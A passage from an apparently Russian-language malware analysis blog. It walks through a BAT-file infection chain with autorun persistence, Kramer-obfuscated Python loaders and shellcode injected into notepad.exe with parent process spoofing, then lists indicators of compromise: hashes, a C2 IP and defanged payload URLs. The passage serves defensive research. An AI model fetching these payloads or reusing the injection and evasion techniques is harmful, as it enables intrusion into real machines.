\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 UTF-16LE (1200) \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 CyberChef<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0421\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0432 \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u0439 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 \u0438 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043c \u043a\u043e\u0434 \u0432 \u0447\u0438\u0442\u0430\u0435\u043c\u044b\u0439 \u0432\u0438\u0434.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 7. \u041a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430 (\u043d\u0430\u0447\u0430\u043b\u043e)<\/em><\/figcaption><\/div>\n<\/figure>\n
\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 8. \u041a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430 (\u043e\u043a\u043e\u043d\u0447\u0430\u043d\u0438\u0435)<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041a\u0430\u043a \u0432\u0438\u0434\u0438\u043c, \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u0440\u043e\u0441\u0442:<\/p>\n

1.\u00a0\u041f\u043e\u043f\u044b\u0442\u043a\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u043b\u044e\u0431\u043e\u0439 PDF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 %USERPROFILE%\\Downloads \u2014 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043e\u0442\u0432\u043b\u0435\u043a\u0430\u044e\u0449\u0435\u0433\u043e \u043c\u0430\u043d\u0435\u0432\u0440\u0430. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u0430\u043c \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u0441\u0430\u043c \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438, \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438, \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 BAT-\u0444\u0430\u0439\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 PDF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442.<\/p>\n

2.\u00a0\u041f\u043e\u0438\u0441\u043a \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c.<\/p>\n

3.\u00a0\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430.<\/p>\n

4.\u00a0\u0420\u0430\u0437\u0430\u0440\u0445\u0438\u0432\u0430\u0446\u0438\u044f \u0438 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435.<\/p>\n

5.\u00a0\u0417\u0430\u043f\u0443\u0441\u043a Python-\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432.<\/p>\n

6.\u00a0\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439.<\/p>\n

7.\u00a0\u0420\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u0432 \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a\u0435.<\/p>\n

8.\u00a0\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0438 \u0438\u0445 \u0440\u0430\u0437\u0430\u0440\u0445\u0438\u0432\u0430\u0446\u0438\u044f.<\/p>\n

\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 startuppp.bat (\u0441\u043c. \u0440\u0438\u0441. 8), \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a, \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043e. \u041f\u043e\u0441\u043b\u0435 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c:<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 9. \u041a\u043e\u043c\u0430\u043d\u0434\u044b \u0432 \u0444\u0430\u0439\u043b\u0435 startuppp.bat<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0418\u0437 \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0444\u0430\u0439\u043b\u0435 startuppp.bat \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043e\u043d \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u0437\u0430\u043f\u0443\u0441\u043a \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u044b\u0445 \u0438 \u0440\u0430\u0437\u0430\u0440\u0445\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 Python. \u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0441\u0435 \u0444\u0430\u0439\u043b\u044b \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0438 \u0438\u0445 \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u0430\u0447\u0430\u0442\u044c, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430.<\/p>\n

\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u043b\u044f \u043f\u0440\u0438\u043c\u0435\u0440\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0430\u0440\u0445\u0438\u0432\u043e\u0432, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 10.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 10. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0430\u0440\u0445\u0438\u0432\u0430 <\/em>FTSP.zip<\/em><\/a><\/figcaption><\/div>\n<\/figure>\n

\u0421\u043b\u0435\u0434\u0443\u0435\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u044b: fv1.py, fv2.py, fv3.py, fv4.py, fv5.py, fv6.py, yam1.py, yam2.py, yam3.py, yam4.py, yam5.py, yam6.py. \u041f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u0438\u0437 \u043d\u0438\u0445 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u044d\u0442\u043e \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b Python. <\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 11. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 yam1.py<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u043c \u0434\u043b\u044f \u0434\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u0438 PyLingual<\/a>. \u0414\u043b\u044f \u043f\u0440\u0438\u043c\u0435\u0440\u0430 \u0432\u043e\u0437\u044c\u043c\u0435\u043c \u0444\u0430\u0439\u043b yam1.py, \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0432 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u043d\u0430 .pyc.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 12. \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0434\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u0438 \u0444\u0430\u0439\u043b\u0430 yam1.pyc<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0415\u0441\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u043d\u0430 \u043a\u043e\u0434 \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 12, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c class Kramer. \u041f\u043e\u0441\u043b\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043a\u043e\u0434\u0430 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u044f\u0441\u043d\u043e, \u0447\u0442\u043e \u043a \u0444\u0430\u0439\u043b\u0443 \u0431\u044b\u043b\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0430 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f Kramer<\/a>. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0442\u043e\u0440\u043e\u043c kramer-specter_deobf<\/a>. \u041f\u043e\u0441\u043b\u0435 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043e\u0434.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 13. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 \u043a\u043e\u0434\u0430 \u043f\u043e\u0441\u043b\u0435 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041f\u0440\u0438 \u0447\u0442\u0435\u043d\u0438\u0438 \u043a\u043e\u0434\u0430 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0435\u0433\u043e \u0432 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442. \u0410\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 (fv1.py, fv2.py, fv3.py, fv4.py, fv5.py, fv6.py, yam1.py, yam2.py, yam3.py, yam4.py, yam5.py, yam6.py) \u043e\u0434\u0438\u043d\u0430\u043a\u043e\u0432. \u0421\u0430\u043c \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0432 \u0441\u043f\u043e\u0441\u043e\u0431, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 14, \u0430 \u0434\u0430\u043b\u044c\u0448\u0435 \u2014 \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u0435\u0433\u043e \u0432 \u0434\u0438\u0437\u0430\u0441\u0441\u0435\u043c\u0431\u043b\u0435\u0440\u0435 \u0438\u043b\u0438 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u0435.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 14. \u0421\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0448\u0435\u043b\u043b\u043a\u043e\u0434\u0430 \u0432 \u0431\u0438\u043d\u0430\u0440\u043d\u043e\u043c \u0444\u0430\u0439\u043b\u0435<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041f\u0440\u0438 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0440\u0430\u0431\u043e\u0442\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 fv1.py, fv2.py, fv3.py, fv4.py, fv5.py, fv6.py, yam1.py, yam2.py, yam3.py, yam4.py, yam5.py, yam6.py \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u043c. \u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430, \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0443\u0441\u043b\u043e\u0432\u0438\u0439 (\u0441\u043c. \u0440\u0438\u0441. 9), \u043a\u0430\u0436\u0434\u044b\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c \u2014 \u0438\u0445 \u0432\u0441\u0435\u0433\u043e \u0448\u0435\u0441\u0442\u044c \u2014 \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 notepad.exe \u0438 \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442 \u0432 \u043d\u0435\u0433\u043e \u043a\u043e\u0434. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0432 \u0434\u0435\u0440\u0435\u0432\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0435\u0441\u0442\u044c \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 notepad.exe, \u043a\u0430\u0436\u0434\u044b\u0439 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430\u043c\u0438.<\/p>\n

\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 parent process spoofing<\/a>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u043b\u043e\u0436\u043d\u044f\u0435\u0442 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435, \u0435\u0441\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043e\u043d \u0443\u0432\u0438\u0434\u0438\u0442, \u0447\u0442\u043e \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 notepad.exe \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u043c \u0437\u043d\u0430\u0447\u0438\u0442\u0441\u044f Explorer.exe.<\/p>\n

\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 15. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 \u043a\u043e\u0434\u0430 \u0438\u0437 startuppp.bat \u0441 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0435\u043c<\/em><\/figcaption><\/div>\n<\/figure>\n
\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16. \u0412\u044b\u0432\u043e\u0434 \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 yam1.py<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/strong><\/p>\n

\u041f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0439 \u043d\u0430\u043c\u0438 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043c\u043d\u043e\u0433\u043e\u043e\u0431\u0440\u0430\u0437\u043d\u044b \u0438 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b. \u041c\u044b \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0438 \u0434\u0432\u0430 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f: \u0432 \u043e\u0434\u043d\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d LNK-\u0444\u0430\u0439\u043b, \u0432 \u0434\u0440\u0443\u0433\u043e\u043c \u2014 BAT-\u0444\u0430\u0439\u043b. \u0412 \u043e\u0431\u043e\u0438\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u042d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u0432 \u043e\u0431\u043e\u0438\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u0445. \u0414\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0440\u0443\u0447\u043d\u043e\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0438 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u0443\u044e \u0437\u0430\u0449\u0438\u0442\u0443.<\/p>\n

IoC (\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 1):<\/strong><\/p>\n

RunScriptProtected.lnk<\/p>\n

7d7b89cb7fa6155b1e01334175ac1c5b<\/p>\n

e777ad0ff4d4510ee345c06c34123b279b0b7ad6<\/p>\n

7c8be71b3cfef2de7343bd48d20e33a6f2f94409d59c50f5ac3a5bbd703789fc<\/p>\n

Payload<\/p>\n

https:\/\/emptyservices[.]xyz\/public\/904e5c82a258472395094ca10082fdfb.txt<\/a><\/p>\n

IoC (\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 2):<\/p>\n

Comman&Control Server<\/p>\n

12.187[.]175.72<\/p>\n

Payload<\/p>\n

http:\/\/dbasopma[.]one:6049\/FTSP.zip<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/cam.zip<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/bab.zip<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/PWS.vbs<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/PWS1.vbs<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/startuppp.bat<\/a><\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

File<\/p>\n

bab.zip<\/a><\/p>\n

\u00a0<\/p>\n

7be44884a763ee99b69a3388407cff98<\/p>\n

ffb8a0d984e443250676957bfc16d02223e38ce7<\/p>\n

ece1e5b6e77d8da8ecdaed554eb09670f0c1bbf80dadd783b6d904542f72ba0e<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

cam.zip<\/a><\/p>\n

\u00a0<\/p>\n

a06c4773ca80b0b7d0fcc05e663cec3d<\/p>\n

825ee18ad6645e7634fc2524af5ef1d394dfab00<\/p>\n

f3661f62ec4a6d8a2077a4f882627c2e039a5270d5e73684881711c712710d23<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

FTSP.zip<\/a><\/p>\n

\u00a0<\/p>\n

a7c55ff964188d62485692b6c2061a8a<\/p>\n

80e8b62250ab32810e8da4fe602b29d303b3a247<\/p>\n

12c1d0dc09a545bda4b219bb87fac6b5a222f7c02a414ee26e0ac92162892f92<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

new.bat<\/p>\n

\u00a0<\/p>\n

b79e56969d36c4b969bbe1623142e74a<\/p>\n

a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd<\/p>\n

6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960<\/p>\n

\u00a0<\/p>\n

PWS.vbs<\/p>\n

\u00a0<\/p>\n

2862ffb5ea32ff114bebe41576441b02<\/p>\n

d9e78d276186e5ca049724796494489e228ff431<\/p>\n

0d7cee0c13374181a23e8f605b32f2969c9c490b83c7891318f26bd17777fd7c<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

PWS1.vbs<\/p>\n

\u00a0<\/p>\n

06480f1e6aa48daab019e8f1a6b834c9<\/p>\n

c735c2d22e2fe79a39111e76a9966d0720f023a1<\/p>\n

5d932bfda0ffd31715700de2fd43fc89c0f1d89eeabac92081ebe2062da84152<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

bab.zip<\/a>-\\bab\\Python\\Python312<\/p>\n

\u00a0<\/p>\n

Music-an.py<\/a><\/p>\n

\u00a0<\/p>\n

c437b4a8b925c986d9cd660295e6e2e4<\/p>\n

8bd2e47531a2676448b3e1dc793919edc898fb84<\/p>\n

fa11c54afcffef94b6e0ee284b37d2c4376f0f7d3295f6fb6fa2d67fb607da2f<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-as.py<\/a><\/p>\n

\u00a0<\/p>\n

